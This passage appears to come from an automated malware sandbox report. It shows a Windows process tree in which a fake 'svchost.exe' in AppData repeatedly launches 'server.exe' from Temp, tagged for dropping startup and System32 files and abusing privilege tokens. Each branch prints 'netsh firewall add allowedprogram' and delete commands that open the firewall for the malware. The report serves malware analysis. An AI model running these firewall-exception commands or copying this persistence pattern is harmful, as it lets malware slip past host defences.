        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:4484
        
        C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
        39⤵
        
        PID:3288
        
        C:\Users\Admin\AppData\Local\Temp\server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\server.exe"
        40⤵
        Drops startup file
        Drops file in System32 directory
        Drops file in Program Files directory
        Suspicious use of AdjustPrivilegeToken
        
        PID:2756
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        41⤵
        
        PID:4184
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe"
        41⤵
        Modifies Windows Firewall
        System Location Discovery: System Language Discovery
        
        PID:4516
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        41⤵
        
        PID:724
        
        C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
        41⤵
        
        PID:3056
        
        C:\Users\Admin\AppData\Local\Temp\server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\server.exe"
        42⤵
        Drops startup file
        Drops file in System32 directory
        Drops file in Program Files directory
        Suspicious use of AdjustPrivilegeToken
        
        PID:4832
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        43⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:3260
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe"
        43⤵
        
        PID:1232
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        43⤵
        
        PID:1108
        
        C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
        43⤵
        
        PID:2484
        
        C:\Users\Admin\AppData\Local\Temp\server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\server.exe"
        44⤵
        Drops file in System32 directory
        Drops file in Program Files directory
        Suspicious use of AdjustPrivilegeToken
        
        PID:944
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        45⤵
        
        PID:2452
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe"
        45⤵
        
        PID:2336
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        45⤵
        System Location Discovery: System Language Discovery
        
        PID:3632
        
        C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
        45⤵
        
        PID:3160
        
        C:\Users\Admin\AppData\Local\Temp\server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\server.exe"
        46⤵
        Drops startup file
        Drops file in System32 directory
        Drops file in Program Files directory
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:828
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        47⤵
        
        PID:2784
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe"
        47⤵
        
        PID:2476
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        48⤵
        
        PID:196
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        47⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:3432
        
        C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
        47⤵
        
        PID:5056
        
        C:\Users\Admin\AppData\Local\Temp\server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\server.exe"
        48⤵
        Drops startup file
        Drops file in System32 directory
        Drops file in Program Files directory
        Suspicious use of AdjustPrivilegeToken
        
        PID:3372
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        49⤵
        Event Triggered Execution: Netsh Helper DLL
        
        PID:5100
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe"
        49⤵
        
        PID:4532
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        49⤵
        Event Triggered Execution: Netsh Helper DLL
        
        PID:4516
        
        C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
        49⤵
        
        PID:2312
        
        C:\Users\Admin\AppData\Local\Temp\server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\server.exe"
        50⤵
        Drops startup file
        Drops file in System32 directory
        Drops file in Program Files directory
        Suspicious use of AdjustPrivilegeToken
        
        PID:832
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        51⤵
        Event Triggered Execution: Netsh Helper DLL
        
        PID:4524
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe"
        51⤵
        
        PID:4980
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        51⤵
        
        PID:4792
        
        C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
        51⤵
        
        PID:3496
        
        C:\Users\Admin\AppData\Local\Temp\server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\server.exe"
        52⤵
        Drops startup file
        Drops file in System32 directory
        Drops file in Program Files directory
        Suspicious use of AdjustPrivilegeToken
        
        PID:4264
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        53⤵
        
        PID:4104
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe"
        53⤵
        
        PID:4680
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        53⤵
        Modifies Windows Firewall
        
        PID:1860
        
        C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
        53⤵
        
        PID:560
        
        C:\Users\Admin\AppData\Local\Temp\server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\server.exe"
        54⤵
        Drops startup file
        Drops file in System32 directory
        Drops file in Program Files directory
        Suspicious use of AdjustPrivilegeToken
        
        PID:1980
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        55⤵
        Event Triggered Execution: Netsh Helper DLL
        
        PID:440
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe"
        55⤵
        
        PID:3176
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        55⤵
        Event Triggered Execution: Netsh Helper DLL
        
        PID:4060
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        56⤵
        
        PID:3372
        
        C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
        55⤵
        
        PID:572
        
        C:\Users\Admin\AppData\Local\Temp\server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\server.exe"
        56⤵
        Drops startup file
        Drops file in System32 directory
        Drops file in Program Files directory
        Suspicious use of AdjustPrivilegeToken
        
        PID:4972
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        57⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:3756
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe"
        57⤵
        Modifies Windows Firewall
        
        PID:2036
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        58⤵
        
        PID:4532
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        57⤵
        System Location Discovery: System Language Discovery
        
        PID:4512
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        58⤵
        
        PID:3496
        
        C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
        57⤵
        System Location Discovery: System Language Discovery
        
        PID:5012
        
        C:\Users\Admin\AppData\Local\Temp\server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\server.exe"
        58⤵
        Drops startup file
        Drops file in System32 directory
        Drops file in Program Files directory
        Suspicious use of AdjustPrivilegeToken
        
        PID:4460
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        59⤵
        
        PID:2308
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe"
        59⤵
        Event Triggered Execution: Netsh Helper DLL
        
        PID:2300
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        59⤵
        Event Triggered Execution: Netsh Helper DLL
        
        PID:1996
        
        C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
        59⤵
        
        PID:1568
        
        C:\Users\Admin\AppData\Local\Temp\server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\server.exe"
        60⤵
        Drops startup file
        Drops file in System32 directory
        Drops file in Program Files directory
        Suspicious use of AdjustPrivilegeToken
        
        PID:4016
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        61⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:724
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe"
        61⤵
        
        PID:4980
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        61⤵
        
        PID:4392
        
        C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
        61⤵
        
        PID:4516
        
        C:\Users\Admin\AppData\Local\Temp\server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\server.exe"
        62⤵
        Drops file in System32 directory
        Drops file in Program Files directory
        Suspicious use of AdjustPrivilegeToken
        
        PID:4264
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        63⤵
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        
        PID:960
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe"
        63⤵
        
        PID:5212
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        63⤵
        
        PID:5220
        
        C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
        63⤵
        
        PID:5596
        
        C:\Users\Admin\AppData\Local\Temp\server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\server.exe"
        64⤵
        Drops startup file
        Drops file in System32 directory
        Drops file in Program Files directory
        Suspicious behavior: GetForegroundWindowSpam
        Suspicious use of AdjustPrivilegeToken
        
        PID:5940
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        65⤵
        Event Triggered Execution: Netsh Helper DLL
        
        PID:5852
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe"
        65⤵
        
        PID:3560
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        65⤵
        
        PID:5864
        
        C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
        65⤵
        
        PID:6368
        
        C:\Users\Admin\AppData\Local\Temp\server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\server.exe"
        66⤵
        Drops startup file
        Drops file in System32 directory
        Drops file in Program Files directory
        Suspicious use of AdjustPrivilegeToken
        
        PID:5452
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        67⤵
        System Location Discovery: System Language Discovery
        
        PID:6248
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe"
        67⤵
        Modifies Windows Firewall
        
        PID:6388
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        67⤵
        Event Triggered Execution: Netsh Helper DLL
        
        PID:6396
        
        C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
        67⤵
        System Location Discovery: System Language Discovery
        
        PID:7132
        
        C:\Users\Admin\AppData\Local\Temp\server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\server.exe"
        68⤵
        Drops startup file
        Drops file in System32 directory
        Drops file in Program Files directory
        
        PID:6760
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        69⤵
        
        PID:6036
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        70⤵
        
        PID:440
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe"
        69⤵
        Event Triggered Execution: Netsh Helper DLL
        
        PID:5184
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        69⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        
        PID:5824
        
        C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
        69⤵
        System Location Discovery: System Language Discovery
        
        PID:2124
        
        C:\Users\Admin\AppData\Local\Temp\server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\server.exe"
        70⤵
        Drops startup file
        Drops file in System32 directory
        Drops file in Program Files directory
        System Location Discovery: System Language Discovery
        
        PID:5576
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        71⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:5484
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe"
        71⤵
        
        PID:3432
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        71⤵
        Event Triggered Execution: Netsh Helper DLL
        
        PID:5948
        
        C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
        71⤵
        System Location Discovery: System Language Discovery
        
        PID:2368
        
        C:\Users\Admin\AppData\Local\Temp\server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\server.exe"
        72⤵
        Drops startup file
        Drops file in System32 directory
        Drops file in Program Files directory
        
        PID:5864
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        73⤵
        System Location Discovery: System Language Discovery
        
        PID:5504
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe"
        73⤵
        Event Triggered Execution: Netsh Helper DLL
        
        PID:7112
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        73⤵
        System Location Discovery: System Language Discovery
        
        PID:7140
        
        C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
        73⤵
        
        PID:2816
        
        C:\Users\Admin\AppData\Local\Temp\server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\server.exe"
        74⤵
        Drops file in System32 directory
        Drops file in Program Files directory
        
        PID:7128
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        75⤵
        
        PID:6568
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe"
        75⤵
        
        PID:6980
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        75⤵
        Modifies Windows Firewall
        
        PID:6984
        
        C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
        75⤵
        System Location Discovery: System Language Discovery
        
        PID:5272
        
        C:\Users\Admin\AppData\Local\Temp\server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\server.exe"
        76⤵
        Drops file in System32 directory
        Drops file in Program Files directory
        
        PID:5428
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        77⤵
        
        PID:6004
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        78⤵
        
        PID:5184
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe"
        77⤵
        Event Triggered Execution: Netsh Helper DLL
        
        PID:5784
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        77⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:6120
        
        C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
        77⤵
        System Location Discovery: System Language Discovery
        
        PID:1568
        
        C:\Users\Admin\AppData\Local\Temp\server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\server.exe"
        78⤵
        Drops startup file
        Drops file in System32 directory
        Drops file in Program Files directory
        
        PID:5704
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        79⤵
        
        PID:6160
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe"
        79⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:5652
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        80⤵
        
        PID:6396
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        79⤵
        
        PID:7100
        
        C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
        79⤵
        
        PID:1528
        
        C:\Users\Admin\AppData\Local\Temp\server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\server.exe"
        80⤵
        Drops startup file
        Drops file in System32 directory
        Drops file in Program Files directory
        System Location Discovery: System Language Discovery
        
        PID:5600
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        81⤵
        
        PID:6660
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe"
        81⤵
        Event Triggered Execution: Netsh Helper DLL
        
        PID:3900
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        81⤵
        
        PID:6540
        
        C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
        81⤵
        
        PID:3084
        
        C:\Users\Admin\AppData\Local\Temp\server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\server.exe"
        82⤵
        Drops startup file
        Drops file in System32 directory
        Drops file in Program Files directory
        
        PID:4284
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        83⤵
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        
        PID:6852
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe"
        83⤵
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        
        PID:5300
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        83⤵
        
        PID:5796
        
        C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
        83⤵
        System Location Discovery: System Language Discovery
        
        PID:6120
        
        C:\Users\Admin\AppData\Local\Temp\server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\server.exe"
        84⤵
        Drops startup file
        Drops file in System32 directory
        Drops file in Program Files directory
        
        PID:5240
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        85⤵
        Event Triggered Execution: Netsh Helper DLL
        
        PID:1388
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe"
        85⤵
        
        PID:6936
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        85⤵
        Event Triggered Execution: Netsh Helper DLL
        
        PID:5848
        
        C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
        85⤵
        
        PID:6952
        
        C:\Users\Admin\AppData\Local\Temp\server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\server.exe"
        86⤵
        Drops startup file
        Drops file in System32 directory
        Drops file in Program Files directory
        
        PID:5504
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        87⤵
        Event Triggered Execution: Netsh Helper DLL
        
        PID:6440
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        88⤵
        
        PID:6220
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe"
        87⤵
        Modifies Windows Firewall
        
        PID:6380
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        87⤵
        
        PID:2252
        
        C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
        87⤵
        System Location Discovery: System Language Discovery
        
        PID:7068
        
        C:\Users\Admin\AppData\Local\Temp\server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\server.exe"
        88⤵
        Drops startup file
        Drops file in System32 directory
        Drops file in Program Files directory
        
        PID:6156
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        89⤵
        
        PID:1092
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe"
        89⤵
        Event Triggered Execution: Netsh Helper DLL
        
        PID:5248
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        89⤵
        
        PID:6448
        
        C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
        89⤵
        
        PID:5932
        
        C:\Users\Admin\AppData\Local\Temp\server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\server.exe"
        90⤵
        Drops startup file
        Drops file in System32 directory
        Drops file in Program Files directory
        
        PID:1812
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        91⤵
        
        PID:6192
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe"
        91⤵
        Event Triggered Execution: Netsh Helper DLL
        
        PID:4136
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        91⤵
        
        PID:5688
        
        C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
        91⤵
        
        PID:1332
        
        C:\Users\Admin\AppData\Local\Temp\server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\server.exe"
        92⤵
        Drops file in System32 directory
        Drops file in Program Files directory
        
        PID:5188
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        93⤵
        Event Triggered Execution: Netsh Helper DLL
        
        PID:7064
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe"
        93⤵
        
        PID:4136
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        93⤵
        
        PID:4800
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        94⤵
        
        PID:2532
        
        C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
        93⤵
        
        PID:7076
        
        C:\Users\Admin\AppData\Local\Temp\server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\server.exe"
        94⤵
        Drops startup file
        Drops file in System32 directory
        Drops file in Program Files directory
        
        PID:3496
        
